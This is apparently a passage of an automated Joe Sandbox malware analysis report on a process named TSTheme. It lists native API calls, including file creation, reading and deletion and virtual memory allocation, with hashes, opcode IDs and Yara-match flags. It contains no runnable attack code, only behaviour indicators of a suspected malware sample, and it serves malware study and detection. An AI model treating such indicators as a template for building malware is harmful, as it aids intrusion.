                                    • Instruction Fuzzy Hash: C8315EB59003087BDB21DFA1CC85FEF777DAB84789F18455CFA09A6180D770AA848FA5
                                    APIs
                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02FE7E30
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction ID: 7eb547db91a36e330c08c7ff2d288f81080ac7258bad907188c9cffb533eadff
                                    • Opcode Fuzzy Hash: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction Fuzzy Hash: 6231C5B5A01209AFCB14DF99DC81EEFB7B9AF8C714F108609F919A3240D774A911CFA5
                                    APIs
                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02FE7F78
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction ID: 39280da2a561e232d730d4b74b7bcaa78641fa05f7371ff2d1439cceaeebd5d0
                                    • Opcode Fuzzy Hash: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction Fuzzy Hash: 753119B1A00209ABDB14DF98DC40EEFB7B9EF8C314F108609F918A3240D370A9118FA5
                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(02FD1A4E,?,02FE6DB7,00000000,00000004,00003000,?,?,?,?,?,02FE6DB7,02FD1A4E,02FE0831,02FE6DB7,00000000), ref: 02FE822A
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: c0c488b485559df72990ccfb6aafe851872c6a3687bd3510d1ffb4048d5f7557
                                    • Instruction ID: 53b239c3404f86d759f500fb99e85986545b4a5e3f1c717a290835f5240338ba
                                    • Opcode Fuzzy Hash: c0c488b485559df72990ccfb6aafe851872c6a3687bd3510d1ffb4048d5f7557
                                    • Instruction Fuzzy Hash: C4212CB5A00209ABDB10DF68DC41FEFB7B9EF88710F108509FE09A7240D774A810CBA5
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 74d524388c9cbe3065b92d4363313ecc9752fb2f60f185aa08dc3c7570f744b6
                                    • Instruction ID: e33b7ab78e160cea6ea3ed4f64f2520abe28dc4da436a392f62614dc04fae1b5
                                    • Opcode Fuzzy Hash: 74d524388c9cbe3065b92d4363313ecc9752fb2f60f185aa08dc3c7570f744b6
                                    • Instruction Fuzzy Hash: 3901A171A002047BE620EA64DC45FABB3ADDF89754F00450DFB1997180D7B1B910CBF6
                                    APIs
                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02FE8054
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction ID: 0a310e918947cbb63b72c92bbb06ae28eb7156955f9664b28b5e83f24c66e4ea
                                    • Opcode Fuzzy Hash: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction Fuzzy Hash: 9FE08C362002087BD620FA69DC01F9BB76DDFC5764F518419FB0CA7242C6B1BA118BF4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 74b2d5888df4d730f904d3a1e5bd46d4cd0c6ab1b2ced7555da500026217a203
                                    • Instruction ID: daf5ac90a6be8df35151d42c4da77f8de2522cb20521baa5b0001cb0cea7fc18
                                    • Opcode Fuzzy Hash: 74b2d5888df4d730f904d3a1e5bd46d4cd0c6ab1b2ced7555da500026217a203
                                    • Instruction Fuzzy Hash: 5F90026260150092414071588944406601597E13113E5C115B4655560C872C89559669
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f444e8f4d6ce0bb9e061cdce67d179c8cdcb3507060ad8daab8a415b8fdce065
                                    • Instruction ID: f9b30bd9e4d37f77a5ace3edeffc3500937a6eb41ddd6b979a399744181fea35
                                    • Opcode Fuzzy Hash: f444e8f4d6ce0bb9e061cdce67d179c8cdcb3507060ad8daab8a415b8fdce065
                                    • Instruction Fuzzy Hash: B6900232605800629140715889C4546401597E0311BA5C011F4525554C8B288A565761
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4ba9f03c1c54467a6151b26aede9e536937e50606a422d9021d9fad221539f76
                                    • Instruction ID: c064eaaccf6c7d5fc0f6b70ec7a799c97862fa044b4d9e80bf41efae9fde9533
                                    • Opcode Fuzzy Hash: 4ba9f03c1c54467a6151b26aede9e536937e50606a422d9021d9fad221539f76
                                    • Instruction Fuzzy Hash: EF90022A21340052D1807158954860A001587D1212FE5D415B4116558CCA2989695721
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f5f5be2a0dee0fd9e9c69f95ec2736f1c5531d324fba5565c840e21b3a636a05
                                    • Instruction ID: d0a7374e7b3efec9834b8d402d1a4f4c6b8f1b29f997df0bc1a5349f5b285fe9
                                    • Opcode Fuzzy Hash: f5f5be2a0dee0fd9e9c69f95ec2736f1c5531d324fba5565c840e21b3a636a05
                                    • Instruction Fuzzy Hash: CE90022230140053D140715895586064015D7E1311FA5D011F4515554CDA2989565622
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 30a597221717d58ce28465cdf1be8464af732f9e774226c443b09bcb3e82331a
                                    • Instruction ID: c87593201271aa94ad8e78d558b4de90828e1f51f2ba4700544b33231c350f06
                                    • Opcode Fuzzy Hash: 30a597221717d58ce28465cdf1be8464af732f9e774226c443b09bcb3e82331a
                                    • Instruction Fuzzy Hash: DA900222242441A25545B1588544507401697E02517E5C012B5515950C863A9956DA21
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 11183ecd88394e48692e690503ed229979eeeb47354d78c1a387dbf15c063bd2
                                    • Instruction ID: 19a13ea026c7d1346755fb83bfba3d97bbdf96cbd86a7b71ad4f96bcc9e8d546
                                    • Opcode Fuzzy Hash: 11183ecd88394e48692e690503ed229979eeeb47354d78c1a387dbf15c063bd2
                                    • Instruction Fuzzy Hash: 0A90023220140463D11171588644707001987D0251FE5C412B4525558D976A8A52A521
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: ac4ab698de29261bde8cb8cf32ce416f5175e04554af1ccdb761101e6eb7bc5a
                                    • Instruction ID: 048232707d9b73bd377dd3009d6f738c0658ed5c96a32a80cc6deb83549c9389
                                    • Opcode Fuzzy Hash: ac4ab698de29261bde8cb8cf32ce416f5175e04554af1ccdb761101e6eb7bc5a
                                    • Instruction Fuzzy Hash: 2690023220148852D1107158C54474A001587D0311FA9C411B8525658D87A989917521
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 31e519691c354a435b1f10801f9ed520760432fe3a0cea9ac8c5399999fbc93d
                                    • Instruction ID: 0c237cee102b5bd72351a82b6f015eb5ee4efc408721a1aafc66de0fc74b8f91
                                    • Opcode Fuzzy Hash: 31e519691c354a435b1f10801f9ed520760432fe3a0cea9ac8c5399999fbc93d
                                    • Instruction Fuzzy Hash: F690023220140892D10071588544B46001587E0311FA5C016B4225654D8729C9517921
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: cea3dd3c15576c69d70d93b16f7fbedfbb833626f55b02bdf2946d47d476ba88
                                    • Instruction ID: 269a742b7e4b1b0e4c71de5fb4c07994f20dee6961d49775cb05ad75457ce2cf
                                    • Opcode Fuzzy Hash: cea3dd3c15576c69d70d93b16f7fbedfbb833626f55b02bdf2946d47d476ba88
                                    • Instruction Fuzzy Hash: C190023220140452D10075989548646001587E0311FA5D011B9125555EC77989916531
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 14ff4e1748dabf084fd1c920ad43f9c939b308fe6db807d12282ad29c84e617f
                                    • Instruction ID: aa0b77b5f0a093634b4e6c97a12ce7fddff64773a5431a61a00b5386af4dcf19
                                    • Opcode Fuzzy Hash: 14ff4e1748dabf084fd1c920ad43f9c939b308fe6db807d12282ad29c84e617f
                                    • Instruction Fuzzy Hash: 9390026234140492D10071588554B060015C7E1311FA5C015F5165554D872DCD526526
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4425e727a0e7f81558f48ddf8b9c614810b6998b995312cccab2056d4ab01be9
                                    • Instruction ID: f25e151a39b59592c7ecca3f9f1d4e218cf11c74f9443fd6593e13df072eb7a1
                                    • Opcode Fuzzy Hash: 4425e727a0e7f81558f48ddf8b9c614810b6998b995312cccab2056d4ab01be9
                                    • Instruction Fuzzy Hash: 909002226014009241407168C9849064015ABE12217A5C121B4A99550D866D89655A65
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 1703381bb715b631f65f242b10fb31553bb5248bdcedf0900fad351ba22104c2
                                    • Instruction ID: 9170da81f95c1789ec789acf9b7ee24aef46a2c9e3e6adc19b5309376ecdc860
                                    • Opcode Fuzzy Hash: 1703381bb715b631f65f242b10fb31553bb5248bdcedf0900fad351ba22104c2
                                    • Instruction Fuzzy Hash: 28900222211C0092D20075688D54B07001587D0313FA5C115B4255554CCA2989615921
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: c3e9161b57e1ac125226b692a93f271d14a6ae10fe8d85b7c35ab2353a0bcaf3
                                    • Instruction ID: c9e22dfa73f952b0d78339f573733bb32e172c38879b4349814a7942a31ae946
                                    • Opcode Fuzzy Hash: c3e9161b57e1ac125226b692a93f271d14a6ae10fe8d85b7c35ab2353a0bcaf3
                                    • Instruction Fuzzy Hash: C390022260140552D10171588544616001A87D0251FE5C022B5125555ECB398A92A531
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 34ba5109f73830a8528d81d2aa8044bab160d4fa620dde844f63d9db5569675f
                                    • Instruction ID: 7d487d0d81bc1f93b336854792a7ad55eb96c6940e3f7e39060e2de889133840
                                    • Opcode Fuzzy Hash: 34ba5109f73830a8528d81d2aa8044bab160d4fa620dde844f63d9db5569675f
                                    • Instruction Fuzzy Hash: F590026220180453D14075588944607001587D0312FA5C011B6165555E8B3D8D516535
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 43a5f54319eb349d5ac57aef0a2f520cffd3869d9677e1f1e1f4af684ccd5a0e
                                    • Instruction ID: 6f666d0ee8766c36ed85004dc24b5c6067a066f233436e42bcc160ce83e58ad5
                                    • Opcode Fuzzy Hash: 43a5f54319eb349d5ac57aef0a2f520cffd3869d9677e1f1e1f4af684ccd5a0e
                                    • Instruction Fuzzy Hash: 5B90026220240053410571588554616401A87E0211BA5C021F5115590DC63989916525
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 0bdedee711d55a16bd4e674bcac7d1838787984d73774f22891e048974305414
                                    • Instruction ID: bd3165e58c341b3cb194e3233963298832d2cb685b4c6aba7334a111161edd78
                                    • Opcode Fuzzy Hash: 0bdedee711d55a16bd4e674bcac7d1838787984d73774f22891e048974305414
                                    • Instruction Fuzzy Hash: 9390023260540852D15071588554746001587D0311FA5C011B4125654D87698B557AA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: c881aa06fe4b9ab9999a5ab1d6f352ddd2c3373d925b084de7b8e729eedf83b4
                                    • Instruction ID: da713a671be4610a7ecca03b24ce49e165e03370965157e2c6a273b52e714b37
                                    • Opcode Fuzzy Hash: c881aa06fe4b9ab9999a5ab1d6f352ddd2c3373d925b084de7b8e729eedf83b4
                                    • Instruction Fuzzy Hash: 2C90023220140852D1807158854464A001587D1311FE5C015B4126654DCB298B597BA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f83c2b8afe5146a5e0b9ebe0a1e475b12ede6d213ffc54dd10c874815a28bdf8
                                    • Instruction ID: a2313f85e90e13e006a21268cce5846af848f76a332371e29c6771621e1112bd
                                    • Opcode Fuzzy Hash: f83c2b8afe5146a5e0b9ebe0a1e475b12ede6d213ffc54dd10c874815a28bdf8
                                    • Instruction Fuzzy Hash: 8090023220544892D14071588544A46002587D0315FA5C011B4165694D97398E55BA61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 0b5e545b82c37e2acda18b5c8644ca90140291fb13764ca1d644b275934b60c7
                                    • Instruction ID: 9eab613dd99a84b1a11fbf515190b4f95accc48442c2f18179da0f9493c6be96
                                    • Opcode Fuzzy Hash: 0b5e545b82c37e2acda18b5c8644ca90140291fb13764ca1d644b275934b60c7
                                    • Instruction Fuzzy Hash: EC900437311400530105F55C47445070057C7D53713F5C031F5117550CD735CD715531
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: aa03c5bcda3283f9959f1f7c271c7f6a17c3b31e32c138c6dc03f1e2535b0119
                                    • Instruction ID: d188a89be193b143541c3b2dfbc45ac11667115067966a7b2f8a595e09ae06f4
                                    • Opcode Fuzzy Hash: aa03c5bcda3283f9959f1f7c271c7f6a17c3b31e32c138c6dc03f1e2535b0119
                                    • Instruction Fuzzy Hash: CD900226221400520145B558474450B045597D63613E5C015F5517590CC73589655721
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 892a09855521812f487bfa68fd13b92e76529d09c2da6531c9a06a177935e455
                                    • Instruction ID: f6a678c4e3750ad506c89a613023b45cd100fa337dcc5968a3bc38875a06a299
                                    • Opcode Fuzzy Hash: 892a09855521812f487bfa68fd13b92e76529d09c2da6531c9a06a177935e455
                                    • Instruction Fuzzy Hash: 6390023260550452D10071588654706101587D0211FB5C411B4525568D87A98A5169A2
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
